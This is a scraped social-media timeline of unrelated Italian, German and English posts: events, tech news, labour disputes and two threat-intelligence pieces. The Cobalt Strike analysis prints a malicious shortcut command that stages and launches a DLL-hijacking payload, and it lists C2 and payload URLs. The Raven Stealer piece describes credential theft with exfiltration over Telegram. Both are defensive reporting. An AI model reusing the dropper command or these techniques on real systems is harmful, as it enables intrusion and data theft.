#Presentazione time!
Sono Benedetta (she/her), una neurospicy transfem aspirante pilota di mech, approdo su Friendica per capire quale possa essere la regione del Fediverso più adatta al mio progettino di #selfhosting (al momento sono principalmente su Mastodon).
Il mio mestiere (e passione) sono i disegnetti, sperando prima o poi di riuscire a fare #fumetti e #comics, ma mi piacciono anche gli #rpg sia da tavolo sia #videogame, la #F1 e un sacco di altre robe. Parlerò probabilmente perlopiù di questo, e della mia vita quotidiana se capita.
Al momento ho iniziato una newsletter per provare a dare ordine a quello che faccio e vivo e parlarne, mi piacerebbe riuscire a stabilire un contatto con le persone (e magari portarle sul fediverso).
Free Palestine, trans rights are human rights, antifa sempre, ma insomma queste sono le basi 👀
Alghero: “Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica”
Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica
Sabato 9 agosto 2025 – ore 21.00 – Alghero (SS)
Dopo la tappa di Quartu Sant’Elena, prosegue ad Alghero l’appuntamento con “Una dose di realtà”, un incontro pubblico dedicato al rapporto tra salute mentale, scienza e politiche sulle terapie psichedeliche.
L’evento si terrà sabato 9 agosto 2025 alle ore 21.00, presso il Ristorante Movida, in Piazza S. Erasmo 9/C, Alghero.
Ingresso gratuito. Seguirà un’apericena di autofinanziamento di euro 24 presso lo stesso ristorante, dalle ore 22:00. Parte del ricavato sarà devoluto ad Associazione Luca Coscioni. Per prenotare l’apericena telefonare al numero 079 974 589
Intervengono:
- Letizia Renzini – MAPS Italia, curatrice de Il Bosco Fiorito
- Tania Re – Psicologa clinica, co-autrice de Il Bosco Fiorito e “È la dose che fa’l veleno”
- Nicola Sportelli – Psichiatra, SIMESPI
- Avy Candeli – Direttore creativo dell’Associazione Luca Coscioni e PsychedelicCare.eu
- Claudia Moretti – Avvocata, responsabile psichedelici dell’Associazione Luca Coscioni
- Caterina Bartoli – Anatomopatologa
- Elisabetta Caria-Zadeh – Farmacista in California
- Federico Di Vita – Illuminismo Psichedelico
Modera:
- Giulia Giglio, Cellula Sardegna dell’Associazione Luca Coscioni
Saluti istituzionali:
- Valdo Di Nolfo, Consigliere Regionale
L’iniziativa è realizzata in collaborazione con la libreria Il Labirinto Mondadori Bookstore e con il patrocinio di:
Associazione Luca Coscioni, Psychedelicare.eu, MAPS Italia, SIMESPI, Quelli da Coscioni Sardegna.
L'articolo Alghero: “Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica” proviene da Associazione Luca Coscioni.
Iglesias: “Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica”
Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica
Giovedì 7 agosto 2025 – ore 19.30 – Iglesias (SU)
Il ciclo di incontri pubblici dedicati a salute mentale e terapie psichedeliche fa tappa a Iglesias con l’iniziativa “Una dose di realtà”, un momento di confronto tra esperti, attivisti e istituzioni su scienza, politiche pubbliche e libertà di ricerca.
L’evento si terrà giovedì 7 agosto 2025 alle ore 19.30, presso la Sala Remo Branca del Palazzo Municipale di Iglesias, in Piazza Municipio. Con il patrocinio del Comune di Iglesias. Seguirà alle 21.30 un aperitivo di autofinanziamento, di cui una parte del ricavato sarà devoluta ad Associazione Luca Coscioni, presso il Bar Ex Farmacia, Piazza Pichi 1. La prenotazione è obbligatoria al numero 347 877 6481.
Intervengono:
- Letizia Renzini – MAPS Italia, curatrice de Il Bosco Fiorito
- Tania Re – Psicologa clinica, co-autrice de Il Bosco Fiorito e “È la dose che fa’l veleno”
- Nicola Sportelli – Psichiatra, SIMESPI
- Avy Candeli – Direttore creativo dell’Associazione Luca Coscioni e PsychedelicCare.eu
- Claudia Moretti – Avvocata, responsabile psichedelici dell’Associazione Luca Coscioni
- Caterina Bartoli – Anatomopatologa
- Elisabetta Caria-Zadeh – Farmacista in California
- Federico Di Vita – Illuminismo Psichedelico
Modera:
- Carla Mura, Giornalista
Saluti istituzionali a cura dell’Amministrazione comunale di Iglesias
L’iniziativa è promossa da:
Associazione Luca Coscioni, Psychedelicare.eu, MAPS Italia, SIMESPI, Cellula Coscioni Sardegna
L'articolo Iglesias: “Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica” proviene da Associazione Luca Coscioni.
A Quartu S. Elena: “Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica”
Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica
Venerdì 8 agosto 2025 – ore 19.30 – Quartu Sant’Elena (CA)
L’appuntamento si terrà venerdì 8 agosto 2025, alle ore 19.30, presso lo Spazio Michelangelo Pira, in via Brigata Sassari 10, Quartu Sant’Elena (CA). Ingresso gratuito. Seguirà alle 21.30 un aperitivo di autofinanziamento presso l’EGO Cafè Bar Lounge, Via Brigata Sassari 25. La prenotazione è obbligatoria al numero 070 204 2710. Parte del ricavato sarà devoluto ad Associazione Luca Coscioni.
Intervengono:
- Letizia Renzini – MAPS Italia, curatrice de Il Bosco Fiorito
- Tania Re – Psicologa clinica, co-autrice de Il Bosco Fiorito e “È la dose che fa’l veleno”
- Nicola Sportelli – Psichiatra, SIMESPI
- Avy Candeli – Direttore creativo dell’Associazione Luca Coscioni e PsychedelicCare.eu
- Claudia Moretti – Avvocata, responsabile psichedelici dell’Associazione Luca Coscioni
- Caterina Bartoli – Anatomopatologa
- Elisabetta Caria-Zadeh – Farmacista in California
- Federico Di Vita – Illuminismo Psichedelico
Modera:
- Carla Mura, Giornalista
Saluti istituzionali:
- Graziano Milia, Sindaco di Quartu Sant’Elena
L’evento è promosso dal Comune di Quartu Sant’Elena, e in collaborazione con: Associazione Luca Coscioni, Psychedelicare.eu, MAPS Italia, SIMESPI, Cellula Coscioni Sardegna.
L'articolo A Quartu S. Elena: “Una dose di realtà – Salute mentale e terapie psichedeliche: cosa dice la scienza, cosa può fare la politica” proviene da Associazione Luca Coscioni.
Everyone’s Invited to the Copyparty
Setting up a file server can be intimidating to the uninitiated. There are many servers to choose from, and then you need to decide how to install it — Docker? Kubernates? Well, what’s all that then? [9001] has come to the rescue with Copyparty, a full-featured file server in a single Python script.
It’s light enough to run on nearly anything, and getting it running could not be easier: run copyparty-sfx.py, and you’ve got a server. There’s even a 32-bit .exe for older Windows machines — Windows 2000 seems to be the oldest version tested.
It’ll connect to anything, both in terms of the variety of protocols supported, and the browsers its web interface loads in. The GitHub documentation says browser support : “Yes”, which is pretty accurate going down the list. Sadly Copyparty’s pages do not work in NACA Mosaic, but IE4 is A-OK.
There’s, FTP, TFTP, HTTP/HTTPS, WebDAV, SMB/CIFS, with unp/zeroconf/mdns/ssdp, etc etc. You need to check the readme for all features, some of which — like transcoding — are only available when dependencies such as ffmpeg installed on the server. Alternatively you can watch the video embedded below to get walked through the features. If the video whets your appetite, can also visit a read-only Copyparty server being demoed on a NUC sitting in [9001]’s basement.
Over the years we’ve seen plenty of folks create personal servers, but the focus is generally on the hardware side of things. While those with more software experience might prefer to configure the various services involved manually, we can definitely see the appeal of a project like Copyparty. In some ways it’s the inverse of the UNIX Philosophy: instead of doing one thing perfectly, this program is doing everything [9001] could think of, and doing it “good enough”.
Thanks to [pedropolis] for inviting us to the Copyparty via the tips line. Building a NAS? Writing software? Hardware?Whatever you do, the tips line is for you.
youtube.com/embed/15_-hgsX2V0?…
Start-ups in der Rüstungsbranche: „Man kann hier von einem neuen militärisch-industriellen Komplex sprechen“
netzpolitik.org/2025/start-ups…
Perché il Garante pizzica Meta per l’IA su Whatsapp
L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
L’Autorità garante della concorrenza e del mercato (Agcm) ha avviato un'istruttoria nei confronti di Meta per presunto abuso di posizione dominante. C'entra la decisione di pre-installare il proprio servizio di intelligenza
Nicola Pizzamiglio likes this.
reshared this
Cobalt Strike Beacon delivered via GitHub and social media
Introduction
In the latter half of 2024, the Russian IT industry, alongside a number of entities in other countries, experienced a notable cyberattack. The attackers employed a range of malicious techniques to trick security systems and remain undetected. To bypass detection, they delivered information about their payload via profiles on both Russian and international social media platforms, as well as other popular sites supporting user-generated content. The samples we analyzed communicated with GitHub, Microsoft Learn Challenge, Quora, and Russian-language social networks. The attackers thus aimed to conceal their activities and establish a complex execution chain for the long-known and widely used Cobalt Strike Beacon.
Although the campaign was most active during November and December 2024, it continued until April 2025. After a two-month silence, our security solutions began detecting attacks again. The adversary employed new malicious samples, which were only slightly modified versions of those described in the article.
Kaspersky solutions detect this threat and assign the following verdicts:
- HEUR:Trojan.Win64.Agent.gen
- HEUR:Trojan.Win64.Kryptik.gen
- HEUR:Trojan.WinLNK.Starter.gen
- MEM:Trojan.Multi.Cobalt.gen
- HEUR:Trojan.Win32.CobaltStrike.gen
Initial attack vector
The initial attack vector involved spear phishing emails with malicious attachments. The emails were disguised as legitimate communications from major state-owned companies, particularly within the oil and gas sector. The attackers feigned interest in the victims’ products and services to create a convincing illusion of legitimacy and increase the likelihood of the recipient opening the malicious attachment.
Sample spear phishing email
All attachments we observed were RAR archives with the following structure:
- Требования.lnk
- Требования
- Company Profile.pdf
- List of requirements.pdf
- Требования
Company profile.pdf and List of requirements.pdf were decoy files designed to complement the information in the email. The directory Требования\Требования contained executables named Company.pdf and Requirements.pdf, designed to mimic secure PDF documents. The directory itself was hidden, invisible to the user by default.
When Требования.lnk was opened, the files in Требования\Требования were copied to %public%\Downloads\ and renamed: Company.pdf became nau.exe, and Requirements.pdf became BugSplatRc64.dll. Immediately afterward, nau.exe was executed.
%cd% /c echo F | xcopy /h /y %cd%\Требования\Требования %public%\Downloads\
& start %cd%\Требования
& ren %public%\Downloads\Company.pdf nau.exe
& ren %public%\Downloads\Requirements.pdf BugSplatRc64.dll
& %public%\Downloads\nau.exe
Contents of Требования.lnk
Требования.lnk execution sequence
Malicious agent
Process flow diagram for nau.exe
In this attack, the adversary leveraged a common technique: DLL Hijacking (T1574.001). To deploy their malicious payload, they exploited the legitimate Crash reporting Send Utility (original filename: BsSndRpt.exe). The tool is part of BugSplat, which helps developers get detailed, real-time crash reports for their applications. This was the utility that the attackers renamed from Company.pdf to nau.exe.
For BsSndRpt.exe to function correctly, it requires BugSplatRc64.dll. The attackers saved their malicious file with that name, forcing the utility to load it instead of the legitimate file.
To further evade detection, the malicious BugSplatRc64.dll library employs Dynamic API Resolution (T1027.007). This technique involves obscuring API functions within the code, resolving them dynamically only during execution. In this specific case, the functions were obfuscated via a custom hashing algorithm, which shares similarities with CRC (Cyclic Redundancy Check).
Hashing algorithm
A significant portion of the hashes within the malicious sample are XOR-encrypted. Additionally, after each call, the address is removed from memory, and API functions are reloaded if a subsequent call is needed.
MessageBoxW function hook
The primary purpose of BugSplatRc64.dll is to intercept API calls within the legitimate utility’s process address space to execute its malicious code (DLL Substitution, T1574.001). Instead of one of the API functions required by the process, a call is made to a function (which we’ll refer to as NewMessageBox) located within the malicious library’s address space. This technique makes it difficult to detect the malware in a sandbox environment, as the library won’t launch without a specific executable file. In most of the samples we’ve found, the MessageBoxW function call is modified, though we’ve also discovered samples that altered other API calls.
Hooking MessageBoxW
After modifying the intercepted function, the library returns control to the legitimate nau.exe process.
NewMessageBox function
Once the hook is in place, whenever MessageBoxW (or another modified function) is called within the legitimate process, NewMessageBox executes. Its primary role is to run a shellcode, which is loaded in two stages.
First, the executable retrieves HTML content from a webpage located at one of the addresses encrypted within the malicious library. In the sample we analyzed, these addresses were techcommunity.microsoft[.]com/… and quora[.]com/profile/Marieforma…. The information found at both locations is identical. The second address serves as a backup if the first one becomes inactive.
NewMessageBox searches the HTML code retrieved from these addresses for a string whose beginning and end match patterns that are defined in the code and consist of mixed-case alphanumeric characters. This technique allows attackers to leverage various popular websites for storing these strings. We’ve found malicious information hidden inside profiles on GitHub, Microsoft Learn Challenge, Q&A websites, and even Russian social media platforms.
Malicious profiles on popular online platforms
While we didn’t find any evidence of the attackers using real people’s social media profiles, as all the accounts were created specifically for this attack, aligning with MITRE ATT&CK technique T1585.001, there’s nothing stopping the threat actor from abusing various mechanisms these platforms provide. For instance, malicious content strings could be posted in comments on legitimate users’ posts.
The extracted payload is a base64-encoded string with XOR-encrypted data. Decrypted, this data reveals the URL raw.githubusercontent[.]com/Ma…, which then downloads another XOR-encrypted shellcode.
We initially expected NewMessageBox to execute the shellcode immediately after decryption. Instead, nau.exe launches a child process with the same name and the qstt parameter, in which all of the above actions are repeated once again, ultimately resulting in the execution of the shellcode.
Shellcode
An analysis of the shellcode (793453624aba82c8e980ca168c60837d) reveals a reflective loader that injects Cobalt Strike Beacon into the process memory and then hands over control to it (T1620).
The observed Cobalt sample communicates with the C2 server at moeodincovo[.]com/divide/mail/SUVVJRQO8QRC.
Attribution and victims
The method used to retrieve the shellcode download address is similar to the C2 acquisition pattern that our fellow security analysts observed in the EastWind campaign. In both cases, the URL is stored in a specially crafted profile on a legitimate online platform like Quora or GitHub. In both instances, it’s also encrypted using an XOR algorithm. Furthermore, the targets of the two campaigns partially overlap: both groups of attackers show interest in Russian IT companies.
It’s worth mentioning that while most of the attacks targeted Russian companies, we also found evidence of the malicious activity in China, Japan, Malaysia, and Peru. The majority of the victims were large and medium-sized businesses.
Takeaways
Threat actors are using increasingly complex and clever methods to conceal long-known tools. The campaign described here used techniques like DLL hijacking, which is gaining popularity among attackers, as well as obfuscating API calls within the malicious library and using legitimate resources like Quora, GitHub, and Microsoft Learn Challenge to host C2 addresses. We recommend that organizations adhere to the following guidelines to stay safe:
- Track the status of their infrastructure and continuously monitor their perimeter.
- Use powerful security solutions to detect and block malware embedded within bulk email.
- Train their staff to increase cybersecurity awareness.
- Secure corporate devices with a comprehensive system that detects and blocks attacks in the early stages.
You can detect the malware described here by searching for the unsigned file BugSplatRc64.dll in the file system. Another indirect sign of an attack could be the presence of Crash reporting Send Utility with any filename other than the original BsSndRpt.exe.
IOCs:
LNK
30D11958BFD72FB63751E8F8113A9B04
92481228C18C336233D242DA5F73E2D5
Legitimate BugSplat.exe
633F88B60C96F579AF1A71F2D59B4566
DLL
2FF63CACF26ADC536CD177017EA7A369
08FB7BD0BB1785B67166590AD7F99FD2
02876AF791D3593F2729B1FE4F058200
F9E20EB3113901D780D2A973FF539ACE
B2E24E061D0B5BE96BA76233938322E7
15E590E8E6E9E92A18462EF5DFB94298
66B6E4D3B6D1C30741F2167F908AB60D
ADD6B9A83453DB9E8D4E82F5EE46D16C
A02C80AD2BF4BFFBED9A77E9B02410FF
672222D636F5DC51F5D52A6BD800F660
2662D1AE8CF86B0D64E73280DF8C19B3
4948E80172A4245256F8627527D7FA96
URL
hxxps://techcommunity[.]microsoft[.]com/users/kyongread/2573674
hxxps://techcommunity[.]microsoft[.]com/users/mariefast14/2631452
hxxps://raw[.]githubusercontent[.]com/fox7711/repos/main/1202[.]dat
hxxps://my[.]mail[.]ru/mail/nadezhd_1/photo/123
hxxps://learn[.]microsoft[.]com/en-us/collections/ypkmtp5wxwojz2
hxxp://10[.]2[.]115[.]160/aa/shellcode_url[.]html
hxxps://techcommunity[.]microsoft[.]com/t5/user/viewprofilepage/user-id/2548260
hxxps://techcommunity[.]microsoft[.]com/t5/user/viewprofilepage/user-id/2631452
hxxps://github[.]com/Mashcheeva
hxxps://my[.]mail[.]ru/mail/veselina9/photo/mARRy
hxxps://github[.]com/Kimoeli
hxxps://www[.]quora[.]com/profile/Marieformach
hxxps://moeodincovo[.]com/divide/mail/SUVVJRQO8QRC
A Dual-Screen Cyberdeck To Rule Them All
We like cyberdecks here at Hackaday, and in our time we’ve brought you some pretty amazing builds. But perhaps now we’ve seen the ultimate of the genre, a cyberdeck so perfect in its execution that this will be the machine of choice in the dystopian future, leaving all the others as mere contenders. It comes courtesy of [Sector 07], and it’s a machine to be proud of.
As with many cyberdecks, it uses the Raspberry Pi as its powerhouse. There are a couple of nice touchscreens and a decent keyboard, plus the usual ports and some nice programmable controls. These are none of them out of the ordinary for a cyberdeck, but what really shines with this one is the attention to detail in the mechanical design. Those touchscreens rotate on ball bearings, the hinges are just right, the connections to the Pi have quick release mechanisms, and custom PCBs and ribbon cables make distributing those GPIOs a snap.
On top of all that the aesthetics are on point; this is the machine you want to take into the abandoned mining base with you. Best of all it’s all available from the linked GitHub repository, and you can marvel as we did at the video below the break.
If you hunger for more cyberdecks, this one has some very stiff competition.
youtube.com/embed/cigAxzQGeLg?…
Thanks [Jeremy Geppert] for the tip.
Arriva Raven Stealer! Il malware che ruba i tuoi dati utilizzando telegram come “strumento di formazione”
Nel contesto della crescente attività di campagne dannose che utilizzano canali di comunicazione legittimi per aggirare le difese tradizionali, un nuovo strumento ha attirato l’attenzione degli specialisti della sicurezza informatica: Raven Stealer. Questo programma di furto di informazioni è apparso nel luglio 2025 e si è già diffuso tramite Telegram e GitHub, attirando l’attenzione non solo per le sue funzionalità, ma anche per la sua combinazione di furtività, facilità d’uso ed efficacia nel recapitare i dati rubati.
Raven è attualmente oggetto di accese discussioni tra gli analisti delle minacce, in quanto dimostra come gli antivirus e i meccanismi di protezione integrati nei browser possano essere aggirati con mezzi semplici. Raven Stealer è sviluppato in Delphi e C++ e prende di mira i sistemi Windows. Raccoglie dati di accesso, dati di pagamento e compilazioni automatiche dai browser Chromium, inclusi Chrome ed Edge. Il malware viene distribuito tramite il canale Telegram di ZeroTrace sotto forma di “strumento di formazione” e consente anche agli utenti inesperti di avviare furti di dati utilizzando il generatore di build integrato. Telegram viene utilizzato anche come canale per la trasmissione di informazioni rubate, eliminando la necessità di un classico server C2.
Gli assembly vengono compressi tramite UPX per rendere difficile l’analisi ed evitare il rilevamento. Una volta avviato, il malware inietta un modulo crittografato nei processi del browser utilizzando chiamate di sistema come NtWriteVirtualMemory, che gli consentono di bypassare il file system. Password, cookie e dati di pagamento vengono estratti in memoria, bypassando la protezione di crittografia associata all’app.
Inoltre, Raven analizza il sistema alla ricerca di portafogli crittografici, VPN e giochi, e salva tutti i dati in un archivio ZIP con il nome utente. Il trasferimento avviene tramite “curl.exe”, che utilizza l’API di Telegram per scaricare file, inclusi screenshot ed elenchi di testo con informazioni riservate. I metodi implementati in Raven corrispondono a diverse tecniche di MITRE ATT&CK: offuscamento, finestre nascoste, directory harvesting e utilizzo di Telegram come canale di comando. Questa architettura rende lo strumento potente e stealth.
Il team di ZeroTrace supporta il progetto dalla fine di aprile 2025, pubblicando aggiornamenti e codice sorgente su GitHub e Telegram. Il malware è già stato confrontato con un altro dei loro prodotti, Octalyn Stealer, a dimostrazione di una strategia sistematica per la distribuzione di infostealer semplici ma efficaci. Come misure di protezione, gli esperti raccomandano di monitorare i file compressi UPX, i flag di avvio non standard del browser, le chiamate curl e l’accesso alle API di Telegram, nonché di utilizzare l’analisi comportamentale e il monitoraggio delle chiamate di sistema.
Raven Stealer è un’ulteriore dimostrazione di quanto facilmente la tecnologia possa essere trasformata in uno strumento di profitto underground. Sotto le mentite spoglie di uno “strumento di formazione”, si cela un’utilità predatoria che non insegna, ma corrompe, semplificando il percorso verso il crimine e sfumando il confine tra sviluppo e complicità.
L'articolo Arriva Raven Stealer! Il malware che ruba i tuoi dati utilizzando telegram come “strumento di formazione” proviene da il blog della sicurezza informatica.
Giornalisti, contratto fermo dal 2016ma agli editori 240 milioni di finanziamenti
Negli ultimi 9 anni gli stipendi degli italiani sono stati erosi dal 19,3% di inflazione certificata dall’Istat. In questi stessi anni diversi contratti di lavoro nazionali sono stati rinnovati: non quello dei giornalisti, fermo al 2016. Gli editori, però, nel frattempo hanno incassato almeno 240 milioni di euro in aiuti dallo Stato e hanno alleggerito le redazioni (meno 15% di giornalisti regolarmente assunti), aumentando il lavoro precario e sottopagato: un articolo viene retribuito in media 10 euro lordi. Un meccanismo che ha garantito alla stragrande maggioranza degli editori di macinare utili. Da 15 mesi la Federazione nazionale della Stampa italiana si sta confrontando con la Federazione Italiana Editori Giornali per rinnovare il contratto nazionale di lavoro giornalistico, chiedendo aumenti dignitosi per il recupero del potere d’acquisto, investimenti sui giovani, linee guida per governare la trasformazione digitale, a partire dall’intelligenza artificiale, idee e progetti per modernizzare l’editoria italiana con l’obiettivo di alzare la qualità del giornalismo e contrastare la disinformazione e le fake news.
La Costituzione sancisce il diritto di ogni lavoratore a una giusta retribuzione che, per i giornalisti, è anche una garanzia di libertà e per i lettori una certezza di qualità: solo retribuzioni adeguate possono assicurare un lavoro professionale attento e profondo e, quindi, un’informazione certa e a difesa dei cittadini. Tutto questo non sembra interessare agli editori, più concentrati sul taglio dei costi e sul prossimo giro di valzer per chiedere altri soldi al Governo piuttosto che sulle numerose sfide imposte dalla rivoluzione digitale per cercare, insieme ai giornalisti, la strada per superare una crisi devastante. Non hanno voluto confrontarsi sull’uso dell’Ai, sul rapporto coi giganti del web che condizionano sempre di più l’informazione (omologandola), sulle prospettive occupazionali, rimandando a chissà quando ogni discussione. Con un evidente problema: rinviare ancora nel caso dell’editoria significa soccombere, portare il settore a morte certa.
Ma anche quando si è provato a trattare un accordo ponte solo per il rinnovo economico, lo schema si è ripetuto. Il recupero dell’inflazione è la linea di demarcazione di tutto il mondo del lavoro del nostro paese. L’offerta della Fieg, invece, è di gran lunga inferiore rispetto ai rinnovi contrattuali degli altri lavoratori del nostro paese i cui redditi reali sotto l’impulso delle organizzazioni sindacali si sono rafforzati. Non solo: mentre da tempo è in atto una progressiva destrutturazione del Contratto Nazionale di Lavoro, gli editori al tavolo hanno chiesto per i nuovi assunti un nuovo salario d’ingresso al ribasso. Un ulteriore sconto sulle assunzioni obbligatorie per legge in seguito a prepensionamenti (che per gli editori, dal 2022, sono completamente gratuiti) e per questo inaccettabile.
Come giornalisti continueremo a fare il nostro dovere di informare i cittadini con coscienza e impegno, ma siamo anche pronti a mobilitarci per difendere i nostri diritti di lavoratori.
Gazzetta del Cadavere reshared this.
AOI: disinformazione del Tg1 su Gaza. Intervenga la Commissione Vigilanza
@Giornalismo e disordine informativo
articolo21.org/2025/07/aoi-dis…
L’AOI (Associazione delle Ong Italiane) esprime sconcerto e profonda preoccupazione per il servizio trasmesso dal Tg1 delle 20 del 27 luglio scorso sulla
Giornalismo e disordine informativo reshared this.
“TeleMeloni”: l’ultima fermata
@Giornalismo e disordine informativo
articolo21.org/2025/07/telemel…
Per comprendere “TeleMeloni”, bisogna compiere qualche passo indietro. Non dobbiamo tornare alla RAI dei “Professori” o a quella di Letizia Moratti, esperienze degli anni Novanta che hanno avuto un impatto ma sono ormai lontane nel tempo. E nemmeno possiamo far riferimento alla stagione di
reshared this
Finti colloqui di lavoro, la nuova frontiera delle frodi: come difendersi
@Informatica (Italy e non Italy 😁)
Un fenomeno crescente che sfrutta diversi aspetti della catena di ricerca di lavoro. Annunci di offerte false, fraudolente ricerche di personale, tutto per carpire dati essenziali dalle vittime e, in alcuni casi, anche installare un ransomware
L'articolo Finti
Informatica (Italy e non Italy 😁) reshared this.
I dazi di Trump sono molto più di una questione commerciale. Scrive Caruso
@Notizie dall'Italia e dal mondo
I dazi di Trump non sono semplicemente uno strumento di riequilibrio commerciale. Sono l’arma principale di una strategia geopolitica più ampia che mira a riorganizzare l’intero sistema globale attorno al controllo americano. Nel contesto di quella che molti analisti
Notizie dall'Italia e dal mondo reshared this.
Appello ai giornalisti europei: fate una donazione ai colleghi di Gaza
@Giornalismo e disordine informativo
articolo21.org/2025/07/appello…
La Federazione europea dei giornalisti (EFJ) e il Sindacato dei giornalisti palestinesi (PJS) hanno lanciato un appello ai giornalisti europei affinché raccolgano
Giornalismo e disordine informativo reshared this.
Cos’è il data masking e quali strumenti si possono usare
@Informatica (Italy e non Italy 😁)
Il termine data masking ha diversi significati a seconda del contesto. È una buona pratica che dovrebbe entrare nelle abitudini di ogni azienda anche grazie ai tanti tool che lo facilitano. Ecco cosa bisogna sapere
L'articolo Cos’è il data masking e quali strumenti si possono usare proviene da Cyber Security 360.
Informatica (Italy e non Italy 😁) reshared this.
freezonemagazine.com/articoli/…
Di solito, in una intervista, le prime righe vengono spese per presentare il personaggio a cui si rivolgeranno le domande. Col professor Roberto Nini, archeologo, storico, docente universitario, speleologo, Ufficiale al Merito della Repubblica, prima di raccontare la sua incredibile esperienza di vita mi sento di riprendere una sua espressione: “io sono l‘uomo del caso”. […]
L'articolo Narni Sotte
Di solito, in una
Perché il boicottaggio digitale non può funzionare
L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
È bizzarra la proposta di boicottaggio digitale che circola in queste ore, come segnale di solidarietà con Gaza (o con Hamas?). L'intervento di Carmen Dal Monte.
Informatica (Italy e non Italy 😁) reshared this.
Internes Protokoll: EU-Juristen kritisieren dänischen Vorschlag zur Chatkontrolle
netzpolitik.org/2025/internes-…
tommis in münchen reshared this.
AVIF: The Avian Image Format
Humans have long admired the sound of birdsong, but to fully appreciate how technically amazing it is, you need an ultrasonic microphone. [Benn Jordan] recently created a video about using these microphones to analyze a collection of bird calls, even training a starling to repeat an image encoded in sound, and has some recommendations for amateurs wanting to get started in computational ornithology.
In the first part of the video, [Benn] set up automated ultrasonic recorders at home, made recordings in Florida and rural Georgia, and visited a starling named “The Mouth,” famous for his ability to mimic human sounds. As a demonstration of his abilities, [Benn] drew a simple bird shape in a spectrogram, converted it into sound, and played it for The Mouth several times. Initially, it didn’t seem that the starling would repeat it, but while he was analyzing his recordings later, [Benn] found the characteristic bird shape. The Mouth had been able to repeat it almost pitch-perfectly. It was in this analysis that the ultrasonic microphones showed their worth, since they were able to slow down the birds’ complex vocalizations enough to detect their complex structures without losing audio quality.
In the rest of the video, [Benn] shares his recommendations for recording and analyzing bird calls. He has some advice for good high-speed audio interfaces, including warnings about those that are overpriced or advertise unrealistic specifications. You’ll also need a microphone with good ultrasonic performance, and he gives a few options for this, including making your own. For analysis software, he particularly recommended Birdnet-Pi, an AI program for identifying birds by their calls, as well as Cornell Lab’s free libraries of ornithology data.
One particularly emphatic recommendation was the open-source AudioMoth ultrasonic microphone and recorder, a project we’ve seen before. He also recommended a sonic camera which serves as a more field-ready version of his own acoustic imaging device.
youtube.com/embed/hCQCP-5g5bo?…
Microsoft licenzia 15.000 dipendenti, Nadella: “Dobbiamo ripensare la nostra missione per una nuova era”
Dal 2025, Microsoft ha licenziato oltre 15.000 dipendenti, e il peso di queste misure di austerità ha rappresentato una forte pressione anche per il CEO Satya Nadella. “Innanzitutto, vorrei affrontare un problema che mi pesa molto e che so essere sentito da molti di voi: i recenti licenziamenti”, ha scritto Nadella in una nota rivolta ai dipendenti giovedì.
Gli investitori hanno reagito positivamente: il 9 luglio, dopo l’ultimo ciclo di licenziamenti, le azioni di Microsoft hanno chiuso per la prima volta sopra i 500 dollari. Solo una settimana prima, l’azienda aveva annunciato il taglio di circa 9.000 posti di lavoro. Si prevede che la forza lavoro complessiva dell’azienda raggiungerà quota 228.000 entro giugno 2024. Tuttavia, Microsoft non ha ancora diffuso un aggiornamento che includa anche i licenziamenti più recenti; Nadella, nella sua comunicazione interna, ha specificato che “la forza lavoro totale rimane sostanzialmente invariata”.
“Questo è il dilemma del successo in un settore senza valore di franchising”, ha scritto. “Il progresso non è lineare. È dinamico, a volte sconvolgente e sempre impegnativo. Ma questo ci offre anche nuove opportunità per plasmare, guidare e avere un impatto maggiore che mai”.
I licenziamenti di Microsoft si inseriscono in una tendenza più ampia che coinvolge l’intero settore tecnologico, che dall’inizio del 2025 ha visto la perdita di oltre 80.000 posti di lavoro. All’inizio di questo mese, ad esempio, Recruit Holdings ha annunciato il licenziamento di 1.300 dipendenti della sua divisione HR Technology, che comprende siti come Indeed e Glassdoor; in una nota interna, l’amministratore delegato ha indicato l’intelligenza artificiale come una delle principali cause di questi tagli.
Negli ultimi mesi, alcuni dipendenti hanno manifestato la propria frustrazione sui social media per le decisioni dell’azienda, soprattutto considerando il ruolo centrale che Microsoft occupa nel panorama tecnologico globale. La scorsa settimana, su LinkedIn, un utente che si è identificato come dipendente Microsoft ha scritto: “Ho sempre amato lavorare per questa azienda e lo faccio ancora, ma questi licenziamenti sono estremamente dannosi per quella lealtà perché dimostrano che i valori predicati da Microsoft non sono applicabili nelle decisioni aziendali a livello macro”.
Microsoft rimane oggi la seconda azienda quotata in borsa più importante al mondo, subito dopo Nvidia, i cui chip rappresentano una componente cruciale per l’addestramento dei modelli di intelligenza artificiale. Se Windows e Office continuano a essere prodotti dominanti, il servizio cloud Azure ha conosciuto una crescita particolarmente rapida negli ultimi anni, grazie anche alla collaborazione con realtà come OpenAI che noleggiano schede grafiche Nvidia per sviluppare le proprie soluzioni di intelligenza artificiale.
Nel suo messaggio, Nadella ha inoltre ricordato la missione che Microsoft si era data nell’ultimo decennio – “consentire a ogni persona e a ogni organizzazione del pianeta di ottenere di più” – sottolineando come l’avvento dell’intelligenza artificiale stia trasformando profondamente questo obiettivo: “Dobbiamo ripensare la nostra missione per una nuova era”, ha scritto. “Cosa significa empowerment nell’era dell’intelligenza artificiale? Non si tratta solo di creare strumenti per ruoli o compiti specifici. Si tratta di creare strumenti che consentano a tutti di creare i propri strumenti. Questa è la trasformazione che stiamo guidando: da una fabbrica di software a un motore intelligente che consente a ogni persona e a ogni organizzazione di costruire tutto ciò di cui ha bisogno per raggiungere i propri obiettivi”.
L'articolo Microsoft licenzia 15.000 dipendenti, Nadella: “Dobbiamo ripensare la nostra missione per una nuova era” proviene da il blog della sicurezza informatica.
Lorenzo Millucci
in reply to Informa Pirata • • •> il boicottaggio digitale è sintomo di qualcosa di più grave: la totale incomprensione di cosa siano gli algoritmi, di come funzioni il tempo su un pianeta diviso in fusi orari e di quanto complessa sia la realtà storica invocata come bandiera.
Informa Pirata likes this.
reshared this
